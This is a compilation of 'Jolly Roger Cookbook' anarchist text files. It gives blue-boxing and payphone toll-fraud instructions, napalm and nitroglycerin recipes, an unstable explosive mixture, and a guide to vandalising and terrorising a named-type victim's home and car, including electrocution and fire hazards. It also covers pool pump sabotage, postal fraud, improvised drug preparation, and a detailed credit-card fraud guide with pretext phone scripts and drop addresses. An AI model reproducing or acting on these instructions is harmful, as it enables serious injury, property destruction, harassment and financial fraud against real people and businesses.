THIS IS ONE THE MOST USEFUL ATTRIBUTES OF BLUE BOXING. NOW THE CONFS.ARE UP 24 HOURS/DAY AND 7 DAYS/WEEK AND THE BILLING LINES ARE BEINGBILLED.SINCE I BELEIVE THE ABOVE IS TRUE (ABOUT THE BILLING LINES BEING BILLED)I WOULD RECOMMEND THAT YOU NEVER LET YOUR # SHOW UP ON THE CONF. IF YOUSTARTED IT, PUT IT ON A LOOP AND THEN CALL THE LOOP. ENOUGHBULLSHIT!!!!! TO START THE CONF. DIAL ONE OF THESE THREE NUMBERS INM-F WHILE YOU ARE ON THE TRUNK.213+080+XXXXXXXX=1050,3050SPECIAL XXXX=1000,1100,1200,1500,2200,2500.THESE #S ARE IN L.A. AND ARE THE MOST WATCHED, I DO NOT ADVISE USING THISNPA.312+001+1050 OR 3050914+042+1050 OR 1100,1200 ECT..***************************************UPDATE, I BELEIVE ONLY 914 WORKS AT THE MOMENT***************************************ONCE CONNECTED WITH ONE OF THESE YOU WILL EITHER HEAR A RE-ORDER,BUSY, OR CHERP. WHEN YOU HEAR THE CHERP ENTER THE BILLING LINE IN M-F.I USE THE CONF. DIAL- UP.A BILLING LINE EXAMPLE: KP312+001+1050STYOU WILL THEN HEAR TWO TUTES AND A RECORDING ASKING YOU FOR THE # OFCONFERREES INCLUDING YOURSELF. ENTER A # BETWEEN 20 AND 30.IF YOU EVER GET OVER 30 PEOPLE ON A CONFERANCE ALL YOU WILL HEAR ISJUMBLED VOICES. AFTER THE IT SAYS"YOUR CONFERANCE SIZE IS XX" THEN HIT # SIGN. ADD YOUR FAVORITE LOOPON AND HIT 6 TO TRANSFER CONTROL TO IT. AFTER IT SAYS CONTROL WILL BETRANSFERED HANG UP AND CALL THE OTHER SIDE OF THE LOOP,HIT # SIGN AND FOLLOW THE INSTRUCTIONS. A BONUS FOR CONF. IS TO ADD ANINTERNATIONAL # DIAL 1+011+CC+NUMBER PRETTY COOL EHHH.A FEW EXTRA NOTES.DO NOT ADD #S THAT YOU WILL WANT TO HANG UP, ADD THESE THROUGH MCI ORSPRINT. YOU CANNOT BLOW ANYONE OFF W/2600HZ UNLESS THEY ARE IN ANOLD X-BAR OR OLDER SYSTEM.MANY D.A. OPERATORS WILL STAY ON AFTER YOU ABUSE THEM; YOU MAY HAVE TOSTART ANOTHER OR AT LEAST DON'T SAY ANY NUMBERS.NEVER ADD THE TONE SIDE OF A LOOP ONTO A CONF.NEVER ADD MORE THAN ONE MCI NODE ON YOUR CONF.ROUTE & RATE:-------------NOTE ROUTE & RATE AND RQS PERFORM THE SAME SERVICE.R&R SIMPLY TELLS YOU ROUTE AND RATE INFO WHICH IS VERY VALUBLE, EX.SUCH AS THE INWARD ROUTING FOR AN EXCHANGE IN AN AREA CODE.AN INWARD ROUTING WILL LET YOU CALL HER AND SHE CAN DO AN EMERGENCY
INTERUPT FOR YOU. SHE CAN TELL YOU HOW TO GET INTERNATIONAL OPERATORS,ECT.HERE ARE THE TERMS YOU ARE REQUIRED TO USE:INTERNATIONAL,-OPERATOR ROUTE FOR [COUNTRY, CITY]. *GIVES YOU INWARD OP.-DIRECTORY ROUTE FOR [COUNTRY, CITY]. *GIVES YOU DIRECTORY ASS.-CITY ROUTE FOR [COUNTRY, CITY]. *GIVES YOU COUNTRY AND CITY CODE.OPERATOR ROUTE FOR [A/C]+ [EXCHANGE] *GIVES YOU INWARD OP. ROUTEEX. [A/C]+ OR [A/C]+0XX+ WHEN SHE SAYS PLUS SHE MEANS PLUS 121.NUMBERS ROUTE FOR [STATE, CITY] *GIVES YOU A/C.PLACE NAME [A/C]+[EXCHANGE] *GIVES YOU CITY/STATE FOR THAT A/C ANDEXCHANGE.INTERNATIONAL CALLS:--------------------TO CALL INTERNATIONAL OVER CABLE SIMPLY ACCESS A TRUNK AND DIALKP011XXXST WAIT FOR SENDER TONE, KPXXXCC-NUMBERSTXXX - A 3 DIGIT COUNTRY CODE, IT MAY NOT BE 3 DIGITS SO JUST PUT1 OR 2 0'S IN FRONT OF IT. CC - IS THE CITY CODETO GO BY SATELLITE:DIAL KP18XST X - NUMBERS 2-8 WAIT FOR SENDER TONE THENKPXXXCCNUMBERST
Blue Box courtesy of the Jolly Roger
To quote Karl Marx, blue boxing has always been the most noble form ofphreaking. As opposed to such things as using an MCI code to make a freefone call, which is merely mindless pseudo-phreaking, blue boxingis actual interaction with the Bell System toll network.It is likewise advisable to be more cautious when blue boxing, but thecareful phreak will not be caught, regardless of what type of switchingsystem he is under.In this part, I will explain how and why blue boxing works, as well aswhere. In later parts, I will give more practical information for blueboxing and routing information. To begin with, blue boxing is simplycommunicating with trunks. Trunks must not be confused with subscriberlines (or "customer loops") which are standard telefone lines. Trunks arethose lines that connect central offices. Now, when trunks are not inuse (i.e., idle or "on-hook" state) they have 2600Hz applied to them. Ifthey are two-way trunks, there is 2600Hz in both directions. When a trunkIS in use (busy or "off-hook" state), the 2600Hz is removed from the sidethat is off-hook. The 2600Hz is therefore known as a supervisorysignal, because it indicates the status of a trunk; on hook (tone) oroff-hook (no tone). Note also that 2600Hz denoted SF (single frequency)signalling and is "in-band." This is very important. "In-band" means thatis within the band of frequencies that may be transmitted over normaltelefone lines. Other SF signals, such as 3700Hz are used also. However,they cannot be carried over the telefone network normally (they are"out-of-band" and are therefore not able to be taken advantage of as2600Hz is. Back to trunks. Let's take a hypothetical phone call. You pickup your fone and dial 1+806-258-1234 (your good friend in Amarillo, Texas).For ease, we'll assume that you are on #5 Crossbar switching and not in the806 area. Your central office (CO) would recognize that 806 is a foreignNPA, so it would route the call to the toll centre that serves you.[For the sake of accuracy here, and for the more experienced readers,note that the CO in question is a class 5 with LAMA that uses out-of-bandSF supervisory signalling]. Depending on where you are in the country,the call would leave your toll centre (on more trunks) to another tollcentre, or office of higher "rank". Then it would be routed to centraloffice 806-258 eventually and the call would be completed.
‡ IllustrationA---CO1-------TC1------TC2----CO2----B
A.... youCO1=your central officeTC1.. your toll office.TC2.. toll office in Amarillo.CO2.. 806-258 central office.B.... your friend (806-258-1234)
In this situation it would be realistic to say that CO2 uses SFin-band (2600Hz) signalling, while all the others use out-of-band signal-ling (3700Hz). If you don't understand this, don't worry. I am pointingthis out merely for the sake of accuracy. The point is that while youare connected to 806-258-1234, all those trunks from YOUR central office(CO1) to the 806-258 central office (CO2) do *NOT* have 2600Hz on them,indicating to the Bell equipment that a call is in progress and the trunksare in use.Now let's say you're tired of talking to your friend in Amarillo, so yousend a 2600Hz down the line. This tone travels down the line to yourfriend's central office (CO2) where it is detected. However, that CO thinksthat the 2600Hz is originating from Bell equipment, indicating to itthat you've hung up, and thus the trunks are once again idle (with 2600Hzpresent on them). But actually, you have not hung up, you have fooled theequipment atyour friend's CO into thinking you have. Thus,it disconnectshim and resets the equipment to prepare for the next call. All this happensvery quickly (300-800ms for step-by-step equipment and 150-400ms for otherequipment). When you stop sending 2600Hz (after about a second), theequipment thinks that another call is coming towards--> on hook, no tone -->off hook.Now that you've stopped sending 2600Hz, several things happen:
1) A trunk is seized.2) A "wink" is sent to the CALLING end from the CALLED end indicating thatthe CALLED end (trunk) is not ready to receive digits yet.3) A register is found and attached to the CALLED end of the trunk withinabout two seconds (max).4) A start-dial signal is sent to the CALLING end from the CALLED endindicating that the CALLED end is ready to receive digits.Now, all of this is pretty much transparent to the blue boxer. All hereally hears when these four things happen is a . So,seizure of a trunk would go something like this:
1> Send a 2600Hz2> Terminate 2600Hz after 1-2 secs.3> [beep][kerchunk]
Once this happens, you are connected to a tandem that is ready to obey yourevery command. The next step is to send signalling information in order toplace your call. For this you must simulate the signalling used byoperators and automatic toll-dialing equipment for use on trunks. There aremainly two systems, DP and MF. However, DP went out with the dinosaurs, soI'll only discuss MF signalling. MF (multi-frequency) signalling is thesignalling used by the majority of the inter- and intra-lata network. It isalso used in international dialing known as the CCITT no.5 system.MF signals consist of 7 frequecies, beginning with 700Hz and separated by200Hz. A different set of two of the 7 frequencies represent the digits 0thru 9, plus an additional 5 special keys. The frequencies and uses are as
follows:
Frequencies (Hz) Domestic Int'l------------------------------------- 700+900 1 1 700+1100 2 2 900+1100 3 3 700+1300 4 4 900+1300 5 51100+1300 6 6 700+1500 7 7 900+1500 8 81100+1500 9 91300+1500 0 0 700+1700 ST3p Code 1 900+1700 STp Code 11100+1700 KP KP11300+1700 ST2p KP21500+1700 ST ST The timing of all the MF signals is a nominal 60ms, except for KP, whichshould have a duration of 100ms. There should also be a 60ms silent periodbetween digits. This is very flexible however, and most Bell equipment willaccept outrageous timings. In addition to the standard useslisted above, MF pulsing also has expanded usages known as "expandedinband signalling" that include such things as coin collect, coin return,ringback, operator attached, and operator attached, and operatorreleased. KP2, code 11, and code 12 and the ST_ps (STart "primes" all havespecial uses which will be mentioned only briefly here.To complete a call using a blue box once seizure of a trunk has beenaccomplished by sending 2600Hz and pausing for the , onemust first send a KP. This readies the register for the digits that follow.For a standard domestic call, the KP would be followed by either 7 digits(if the call were in the same NPA as the seized trunk) or 10 digits (if thecall were not in the same NPA as the seized trunk). [Exactly like dialingnormal fone call]. Following either the KP and 7 or 10 digits, a STart issent to signify that no more digits follow. Example of a complete call:
1> Dial 1-806-258-12342> wait for a call-progress indication (such as ring,busy,recording,etc.)3> Send 2600Hz for about 1 second.4> Wait for about ll-progress indication (such as ring,busy,recording,etc.)5> Send KP+305+994+9966+STThe call will then connect if everything was done properly. Note that if acall to an 806 number were being placed in the same situation, the are codewould be omitted and only KP + seven digits + ST would be sent.Code 11 and code 12 are used in international calling to requestcertain types of operators. KP2 is used in international calling to route acall other than by way of the normal route, whether for economic orequipment reasons. STp, ST2p, and ST3p (prime, two prime, and three prime)are used in TSPS signalling to indicate calling type of call (such ascoin-direct dialing.Napalm (Another way to make it...) by the Jolly Roger
(See file #021 of the Cookbook for an easy way to make it!!)
About the best fire bomb is napalm. It has a thick consistancy,like jam and is best for use on vehilces or buildings.Napalms is simply one part gasoline and one part soap. The soap is
either soap flakes or shredded bar soap. Detergents won't do.The gasoline must be heated in order for the soap to melt. Theusual way is with a double boiler where the top part has at least atwo-quart capicity. The water in the bottom part is brought to a boiland the double boiler is taken from the stove and carried to wherethere is no flame.Then one part, by volume, of gasoline is put in the top part andallowed to heat as much as it will and the soap is added and the messis stirred until it thickens. A better way to heat gasoline is to filla bathtub with water as hot as you can get it. It will hold its heatlonger and permit a much larger container than will the double boiler.
---------------Jolly Roger
Nitroglycerin Recipe by the Jolly Roger
Like all chemists I must advise you all to take the greatest careand caution when you are doing this. Even if you have made this stuffbefore.This first article will give you information on makingnitroglyerin, the basic ingredient in a lot of explosives such asstraight dynamites, and geletin dynamites.Making nitroglycerin1. Fill a 75-milliliter beaker to the 13 ml. Level with fuming red nitric acid, of 98% pure concentration.2. Place the beaker in an ice bath and allow to cool below room temp.3. After it has cooled, add to it three times the amount of fuming sulferic acid (99% h2so4). In other words, add to the now-cool fuming nitric acid 39 ml. Of fuming sulferic acid. When mixing any acids, always do it slowly and carefully to avoid splattering.4. When the two are mixed, lower thier temp. By adding more ice to the bath, about 10-15 degrees centigrade. (Use a mercury-operated thermometer)5. When the acid solution has cooled to the desired temperature, it is ready for the glycerin. The glycerin must be added in small amounts using a medicine dropper. (Read this step about 10 times!) Glycerin is added slowly and carefully (i mean careful!) Until the entire surface of the acid it covered with it.6. This is a dangerous point since the nitration will take place as soon as the glycerin is added. The nitration will produce heat, so the solution must be kept below 30 degrees centigrade! If the solution should go above 30 degrees, immediately dump the solution into the ice bath! This will insure that it does not go off in your face!7. For the first ten minutes of nitration, the mixture should be gently stirred. In a normal reaction the nitroglycerin will form as a layer on top of the acid solution, while the sulferic acid will absorb the excess water.8. After the nitration has taken place, and the nitroglycerin has formed on the top of the solution, the entire beaker should be transferred slowly and carefully to another beaker of water. When this is done the nitroglycerin will settle at the bottem so the other acids can be drained away.9. After removing as much acid as posible without disturbing the nitroglycerin, remove the nitroglycerin with an eyedropper and
place it in a bicarbonate of soda (sodium bicarbonate in case you didn't know) solution. The sodium is an alkalai and will nuetralize much of the acid remaining. This process should be repeated as much as necesarry using blue litmus paper to check for the presence of acid. The remaining acid only makes the nitroglycerin more unstable than it already is.10. Finally! The final step is to remove the nitroglycerin from the bicarbonate. His is done with and eye- dropper, slowly and carefully. The usual test to see if nitration has been successful is to place one drop of the nitroglycerin on metal and ignite it. If it is true nitroglycerin it will burn with a clear blue flame.** Caution **Nitro is very sensative to decomposition, heating dropping, orjarring, and may explode if left undisturbed and cool. -------------Jolly Roger
Operation: Fuckup by the Jolly Roger
This is a guide for Anarchists and can be funny for non-believers and 12and 13 year old runts, and can be a lexicon of deadly knowledge for TrueAnarchists... Serious damage is intended to be dealt here. Do not trythis stuff unless you want to do a lot of serious Anarchy.[Simulation]Asshole - 'Listen, you little teenager punk shit, shut the fuck up, or I'llknock you down!'Anarchist - 'O.K.....You can't say I didn't warn you. You don't know myrue power...' (soooo casually)Asshole - 'Well, er, what do you mean? Anarchist - ''As you can see, the Anarchist knows something that this asshole doesn't...
[Operation Fuckup]Geta wheel barrel or two. Fill with gasoline. Get 16 rolls of toiletpaper, unroll & drench in the gasoline. Rip to shreds in gasoline. Getasbestos gloves. Light a flare (to be punk), grab glob ofsaturated toilet paper (you can ignite the glob or not). Throw eitherflaming or dripping glob into:any window (picture is the best)front doorsrough grain sidingand best of all, brick walls.First of all, this bitch is near impossible to get off once dried, andis a terror to people inside when lit! After this... during thenight, get a pickup truck, a few wheel-barrels, and a dozen friends withshovels. The pickup can be used only for transporting peopleand equipment, or doing that, and carting all the dirt. When it getsaround 12:00 (after the loser goes beddie - bye), dig a gargantuan holein his front yard until about 3:00. You can either assign three or fourof your friends to cart the dirt ten miles away in the pickup-bed, orbury his front door in 15' of dirt! After that is done, getthree or four buckets of tar, and coat his windows. You can make anadded twist by igniting the tar when you are all done and ready torun! That is if the loser has a house. If he lives inside an apartmentbuilding, you must direct the attack more toward his car, and front door.I usually start out when he goes to work...I find out what his cheap carlooks like, and memorize it for future abuse...It is always fun to painthis front door (apt.) hot pink with purple polka-dots, and off-neoncolors in diagonal stripes. You can also pound a few hundred or so four
inch nails into his front door (this looks like somebody reallydoesn't like you from the inside). Another great is to fill his keyholewith liquid steel so that after the bastard closes his door - theonly way to get back in is to break it down. If you can spare it, leavehim an axe - that is, implanted three inches into, and through the door!Now, this next one is difficult, but one of the best! Get a piece of woodsiding that will more than cover his front door completely. Nail two byfours on the edges of the siding (all except the bottom) so you havea barge - like contraption. Make a hole at the top that will be largeenough for a cement slide. Mix about six or seven LARGE bags of QUICKdrying cement. Use the cement slide to fill the antichamber created bythe 'barge' that is around his door. Use more two by fours to braceyour little cement-filled barge, and let the little gem dry. When it is,remove the 'barge' so only a stone monolith remains that covers his door.Use any remaining cement to make a base around this so he can't just pushit over. When I did this, he called the fire department, and they thoughthe meant wood, so they brought axes. I watched with a few dozen or soother tenants, and laughed my damn ass off! This is only his door! Afterhe parks his car for the night, the fun really begins...I start outby opening up the car by jamming a very thin, but loack - inside and out!Then proceed to put orange-juice syrup all over the seats, so after hegets through all the other shit that you do, he will have the stickiestseats in the world. You can then get a few Sunday papers, and crack one ofthe windows about four inches. Lightly crumple the papers, and continue tocompletely fill the inside of his car with the newspapers. A copy of theSunday New York Times will nicely fill a Volkeswagon! What is also quiteamusing is to put his car on cinder blocks, slash his tires at the top, andfill them with cement! Leave the cinder blocks there so that, after heknocks the car off of them, he will get about 3 miles to the gallon withthose tires, and do 0 to 60 in about two minutes! It is even morehilarious when he doesn't know why the hell why! Another is to open hishood, and then run a few wires from the sparkplugs to the METAL body.The sure is one HOT car when it is running! Now, I like to pour two poundsof sugar down his gas tank. If this doesn't blow every gasket in hisengine it will do something called 'carmelizing his engine'. This is whenthe extreme heat turns the sugar to carmel, and you literally mustcompletely take the engine out and apart, and clean each and everyindividual part!Well, if this asshole does not get the message, you had better start toget serious. If this guide was used properly & as it was intended (no,not as kindling for the fire), this asshole will either move far away,seek professional psychological help, commit suicide,or all of the above!
--------------Jolly Roger
*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-** How to "steal" local calls from most Payphones **-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-* by the Jolly Roger
Now to make free local calls, you need a finishing nail. I highlyrecommend "6D E.G. FINISH C/H, 2 INCH" nails. These are about 3/32 ofan inch in diameter and 2 inches long (of course). You also need a largesize paper clip. By large I mean they are about 2 inches long(FOLDED). Then you unfold the paper clip. Unfold it by taking each pieceand moving it out 90 degrees. When it is done it should look somewhat
like this:
/----------\ : : : : : : : : \-----
Now, on to the neat stuff. What you do, instead of unscrewing theglued-on mouthpiece, is insert the nail into the center hole ofthe mouthpiece (where you talk) and push it in withpressure or just hammer it in by hitting the nail on something.Just DON'T KILL THE MOUTHPIECE! You could damage itif you insert the nail too far or at some weird angle. If thishappens then the other party won't be able to hear what you say.You now have a hole in the mouthpiece in which you can easily insert thepaper clip. So, take out the nail and put in the paper clip.Then take the other end of the paper clip and shove it under the rubbercord protector at the bottom of the handset (you know, the blue guy...).This should end up looking remotely like...like this: /----------\ Mouthpiece : : Paper clip --> : : / : /---:---\ : : : :------------> ====================\---))): : To earpiece -> ^ ^ \--------------------> : : : : Cord Blue guy(The paper clip is shoved under the blue guy to make a good connectionbetween the inside of the mouthpiece and the metal cord.)Now, dial the number of a local number you wish to call, sayyyy,MCI. If everything goes okay, it should ring and not answer with the"The Call You Have Made Requires a 20 Cent Deposit" recording. After theother end answers the phone, remove the paper clip. It's all thatsimple, see?There are a couple problems, however. One is, as I mentionedearlier, the mouthpiece not working after you punch it. If thishappens to you, simply move on to the next payphone. The one you arenow on is lost. Another problem is that the touch tones won't workwhen the paper clip is in the mouthpiece. There are two ways around this..
A> Dial the first 6 numbers. This should be done without the paper clipmaking the connection, i.e., one side should not be connected. Then connectthe paper clip, hold down the last digit, and slowly pull the paper clipout at the mouthpiece's end.
B> Don't use the paper clip at all. Keep the nail in after you punch it.Dial the first 6 digits. Before dialing the last digit, touch the nailhead to the plate on the main body of the phone, the money safe thingy.then press the last number. The reason that this method is sometimes calledclear boxing is because there is another type of phone which lets youactually make the call and listen to them say "Hello, hello?" but it cutsoff the mouthpiece so they can't hear you. The Clear Box is used on that toamplify your voice signals and send it through the earpiece. If you see howthis is even slightly similar to the method I have just described up there,kindly explain it to ME!! Cause I don't GET IT! Anyways, this DOES work onalmost all single slot, Dial Tone First payphones (Pacific Bell for sure).I do it all the time. This is the least, I STRESS *LEAST*, risky form ofPhreaking.
I was unable to update this one. From what I recall, it stil worked. Lookfor payfones w/o the little volume button in the upper left of the casing.They should be old enough to use.. -Exodus-
Pool Fun by the Jolly Roger
First of all, you need know nothing about pools. The only thing you needknow is what a pool filter looks like. If you don't know that.Second, dress casual. Preferably, in black. Visit your "friends" house,the one whose pool looks like fun!!) Then you reverse the polarity ofhis/her pool, by switching the wires around. They are located in the backof the pump. This will have quite an effect when the pump goes on. In otherwords. Boooooooooooommm!Thats right, when you mix + wires with - plugs, and vice- versa, the 4th of july happens again. Not into total destruction??? When the pump is off, switch the pump to "backwash". Turn the pump on and get the phuck out! When you look the next day, phunny. The pool is dry. If you want permanant damage, yet no great display like my first one mentioned, shut the valves of the pool off. (There are usually 2) One that goes to the main drain and one that goes to the filter in the pool. That should be enough to have one dead pump. The pump must take in water, so when there isn't any...
Practical jokes: these next ones deal with true friends and there is *no* permanent damage done. If you have a pool, you must check the pool with chemicals. There is one labeled orthotolidine. The other is labeled alkaline (ph). You want orthotolidine. (It checks the chlorine).Go to your local pool store and tell them you're going into the pool business, and to sell you orthotolidine (a CL detector) Buy this in great quantities if possible. The solution is clear. You fill 2 baggies with this chemical. And sew the bags to the inside of your suit. Next, go swimming with your friend! Then open the bags and look like you're enjoying a piss. And anyone there will turn a deep red! They will be embarrased so much, especially if they have guests there! Explain what it is, then add vinegar to the pool. Only a little. The "piss" disappears.
HAHA!! --------------Exodus------------
Free Postage by the Jolly Roger
The increasing cost of postage to mail letters and packages isbringing down our standard of living. To remedy this deplorablesituation, some counter control measures can be applied.For example, if the stamps on a letter are coated with Elmer'sGlue by the sender, the cancellation mark will not destroy the stamp:the Elmer/s drives to form an almost invisible coating that protectsthe stamps from the cancellation ink. Later, the receiver of theletter can remove the cancellation mark with water and reuse thestamps. Furthermore, ecological saving will also result from recyclingthe stamps. Help save a tree.
The glue is most efficently applied with a brush with stiff,short bristles. Just dip the brush directly into the glue and spreadit on evenly, covering the entire surface of the stamp. It will dryin about 15 minutes.For mailing packages, just follow the same procedure as outlinedabove; however, the package should be weighed and checked to make surethat it has the correct amount of postage on it before it is taken tothe Post Office.Removing the cancellation and the glue from the stamps can beeasily accomplished by soaking the stamps in warm water until theyfloat free from the paper. The stamps can then be put onto a papertowel to dry. Processing stamps in large batches saves time too.Also, it may be helpful to write the word 'Elmer' at the top of theletter (not on the envelope) to cue the receiving party in that thestamps have been protected with the glue.We all know that mailing packages can be expensive. And we alsoknow that the handicapped are sometimes discriminated against in jobs.The Government, being the generous people they are, have given theblind free postal service.Simply address you envelope as usual, and make one modification.In the corner where the stamp would go, write in (or stamp) the words'FREE MATTER FOR THE BLIND". Then drop you package or letter in oneof the blue fedral mailboxes. DO NOT TAKE THE LETTER TO THE POSTOFFICE, OR LEAVE IT IN YOUR MAILBOX.Sounds very nice of the government to do this, right? Well, theyaren't that nice. The parcel is sent library rate, that is belowthird class. It may take four to five days to send a letter to justthe next town.This too is quite simple, but less effective. Put the addressthat you are sending the letter to as the return address. If you weresending a $20 donation to the pirate's Chest, you would put ouraddress (po box 644, lincoln ma. 01773) as the return address.Then you would have to be carless and forget to put the stamp onthe envelope. A nice touch is to put a bullshit address in the centerof the envelope.Again, you MUST drop the letter in a FEDRAL mailbox. If the postoffice doesn't send the letter to the return address for having nostamp, they will send it back for the reason of "No such address".Example--
Pirates Chest Dept. 40DDP.O. Box 644865Lincol, Ma. 41773
Tom Bullshit 20 Fake Road What Ever, XX 99851
One last thing you might try doing is soaking a cancelled stampoff of an envelope, and gluing it onto one you are sending. Then burnthe stamp, leaveing a little bit to show that there was one there.
--------------Jolly Roger
Unstable Explosives by the Jolly Roger
Mix solid Nitric Iodine with househould ammonia. Wait overnight andthen pour off the liquid. You will be left with a muddy substance. Let
this dry till it hardens. Now throw it at something!!!!
----------------Jolly Roger
Weird Drugs by the Jolly Roger
Bananas:1. Obtain 15 pounds of ripe yellow bananas2. Peel all and eat the fruit. Save the peelings3. Scrape all the insides of the peels with a sharp knife.4. Put all the scraped material in a large pot and add water.5. Boil 3 or 4 hours until it has attained a solid paste considtency.6. Spread paste onto cookie sheets and dry in ofen for about 20 minutes. This will result in fine black powder. Usually one will feel the effects after smoking three to four cigarettes.
Cough syrup:mix robitussion a-c with an equal amount of ginger ale and drink. Theeffect are sedation and euphoria. Never underestimate the effects ofany drug! You can od on cough syrup!
Toads:1. Collect five to ten toads, frogs will not work. The best kind are tree toads.2. Kill them as painlessly as possible, and skin immediately.3. Allow the skins to dry in a refrigerator four four to five days, or until the skins are brittle.4. Now crush the skins into powder and smoke. Due to its bad taste you can mix it with a more fragrent smoking medium.
Nutmeg:1. Take several whole nutmegs and grind them up in an old grinder.2. After the nutmegs are ground. Place in a mortar and pulverize with a pestle.3. The usual dosage is about 10 or 15 grams. A larger dose may produce excessive thirst,anxiety,and rapid hart beat, but hallucinations are rare.
Peanuts:1. Take 1 pound of raw peanuts (not roasted)2. Shell them, saving the skins and discarding the shells.3. Eat the nuts.4. Grind up the skins and smoke them.
------------------Jolly Roger
The Art of Carding by the Jolly Roger
Obtaining a credit card number: There are many ways to obtain theinformation needed to card something.The most important things needed are the card number and the expirationdate. Having the card-holders name doesn't hurt, but it is not essential.The absolute best way to obtain all the information needed is by trashing.The way this is done is simple. You walk around your area or any otherarea and find a store, mall, supermarket, etc., that throws theirgarbage outside on the sidewalk or dumpster. Rip the bag open and seeif you can find any carbons at all. If you find little shreds ofcredit card carbons, then it is most likely not worth your time to tape
together. Find a store that does not rip their carbons at all or only inhalf.Another way is to bullshit the number out of someone. That is call themup and say "Hello, this is Visa security and we have a report thatyour card was stolen." They will deny it and you will try to get it outof them from that point on. You could say, "It wasn't stolen? Well whatis the expiration date and maybe we can fix the problem....Ok and what is the number on your card?......Thank you very much andhave a nice day." Or think of something to that degree.Another way to get card numbers is through systems such as TRW and CBI,this is the hard way, and probably not worth the trouble, unless you arean expert on the system. Using credit card numbers posted on BBS's isrisky. The only advantage is that there is a good chance that otherpeople will use it, thus decreasing the chances of being thesole-offender. The last method of getting numbers is very good also.In most video rental stores, they take down your credit card numberwhen you join to back-up your rentals. So if you could manage to stealthe list or make a copy of it, then you are set for a LONG time.Choosing a victim: Once you have the card number, it is time to make theorder. The type of places that are easiest to victimize are smallbusinesses that do mail order or even local stores that deliver.If you have an ad for a place with something you want and the order numberis NOT a 1-800 number then chances are better that you will succeed.Ordering: When you call the place up to make the order, you must haveseveral things readily at hand.These are the things you will need: A name, telephone number, businessphone, card number (4 digit bank code if the card is MasterCard),expiration date, and a complete shipping and billing address.I will talk about all of these in detail. A personal tip: When I callto make an order, it usually goes much smoother if the person you aretalking to is a woman. In many cases they are more gullible than men.The name: You could use the name on the card or the name of the personwho you are going to send the merchandise to. Or you could use the nameon the card and have it shipped to the person who lives at the drop(Say it is a gift or something).The name is really not that important because when the company verifiesthe card, the persons name is never mentioned, EXCEPT when you have aPreffered Visa card. Then the name is mentioned. You can tell if youhave a Preffered Visa card by the PV to the right of the expirationdate on the carbon. Nophone all day long waiting for the company to call(Which they will), then the phone number to give them as your home-phonecould be one of the following: A number that is ALWAYS busy, a numberthat ALWAYS rings, a payphone number, low end of a loop (and you will waiton the other end), or a popular BBS.NEVER give them your home phone because they will find out as soon asthe investigation starts who the phone belongs to. The best thing wouldbe to have a payphone call forward your house(via Cosm The business number: When asked for, repeat the number youused for your home phone.Card number: The cards you will use will be Visa, Mastercard, andAmerican Express. The best is by far Visa. It is the moststraight-forward. Mastercard is pretty cool except for the bank code.When they ask for the bank code, they sometimes also ask for the bankthat issued it. When they ask that just say the biggest bank you know ofin your area. Try to avoid American Express. They tend to lead fullscale investigations. Unfortunately, American Express is the most popularcard out. When telling the person who is taking your call the cardnumber, say it slow, clear, and with confidence.
e.g. CC# is 5217-1234-5678-9012. Pause after each set of four so youdon't have to repeat it.Expiration date: The date must be at LEAST in that month. It is bestto with more than three months to go.The address: More commonly referred to as the 'drop'. Well the dropcan range from an abandoned building to your next door neighborsapartment. If you plan to send it to an apartment building then besure NOT to include an apartment number. This will confuse UPS or postagemen a little and they will leave the package in the lobby.Here is a list of various drops: The house next door whose family is onvacation, the apartment that was just moved out of, the old church thatwill be knocked down in six months, your friends house who has absolutelynothing to do with the type of merchandise you will buy and who willalso not crack under heat from feds, etc..There are also services that hold merchandise for you, but personallyI would not trust them. And forget about P.O. Boxes because you needID to get one and most places don't ship to them anyway.Other aspects of carding:Verifying cards, seeing if they were reportedstolen.Verifying cards: Stores need to verify credit cards when someone purchasessomething with one. They call up a service that checks to see if thecustomer has the money in the bank.The merchant identifies himself with a merchant number. The servicethen holds the money that the merchant verified on reserve. When themerchant sends in the credit card form, the service sends the merchantthe money. The service holds the money for three days and if no formappears then it is put back into the bank. The point is that if youwant to verify something then you should verify it for a little amountand odds are that there will be more in the bank.The good thing about verification is that if the card doesn't exist orif it is stolen then the service will tell you. To verify MasterCardand Visa try this number. It is voice:1-800-327-1111 merchant code is596719.Stolen cards: Mastercard and Visa come out with a small catalog everyweek where they publish EVERY stolen or fraudulantly used card.I get this every week by trashing the same place on the same day.If you ever find it trashing then try to get it every week.Identifying cards: Visa card numbers begin with a 4 and have either 13or 16 digits. MasterCard card numbers begin with a 5 and have 16 digits.American Express begins with a 3 and has 15 digits. They all have theformats of the following:3xxx-xxxxxx-xxxxx American Express4xxx-xxx-xxx-xxx Visa4xxx-xxxx-xxxx-xxxx Visa5xxx-xxxx-xxxx-xxxx MasterCardGold cards: A gold card simply means that credit is good for $5000.Without a gold card, credit would be normally $2000.To recognize a gold card on a carbon there are several techniques:American Express-none.Visa-PV instead of CV.Note-When verifying a PV Visa, you have to have the real name of thecardholder.Mastercard-An asterix can signify a gold card, but this changes dependingwhen the card was issued.I am going to type out a dialog between a carder and the phone operatorto help you get the idea.Operator: "Over-priced Computer Goods, may I help you?"Carder: "Hi, I would like to place an order please."
Operator: "Sure, what would you like to order?"Carder: "400 generic disks and a double density drive."Operator: "Ok, is there anything else?"Carder: "No thank you, that's all for today."Operator: "Ok, how would you like to pay for this? MasterCard or Visa?"Carder: "Visa."Operator: "And your name is?"Carder: "Lenny Lipshitz." (Name on card)Operator: "And your Visa card number is?"Carder: "4240-419-001-340" (Invalid card)Operator: "Expiration date?"Carder: "06-92."Operator: "And where would you like the package shipped to?"Carder: "6732 Goatsgate Port. Paris,texas,010166."Operator: "And what is your home telephone number?"Carder: "212-724-9970" (This number is actually always busy)Operator: "I will also need your business phone number in case we haveto reach you."Carder: "You can reach me at the same number. 212-724-9970"Operator: "O.K. Thank you very much and have nice day."Carder: "Excuse me, when will the package arrive?"Operator: "In six to seven days UPS."Carder: "Thanks alot, and have a pleasant day."Now you wait 6-7 days when the package will arrive to the address whichis really a house up for sale. There will be a note on the doorsaying, "Hello UPS, please leave all packages for Lenny Lipshitz in thelobby or porch. Thanks alot, Lenny Lipshitz" (Make the signature half-wayconvincing)
------------------Jolly Roger
Recognizing credit cards by the Jolly Roger
[Sample: American Express] XXXX XXXXXX XXXXX MM/Y1 THRU MM/Y2 Y1 John Doe AX
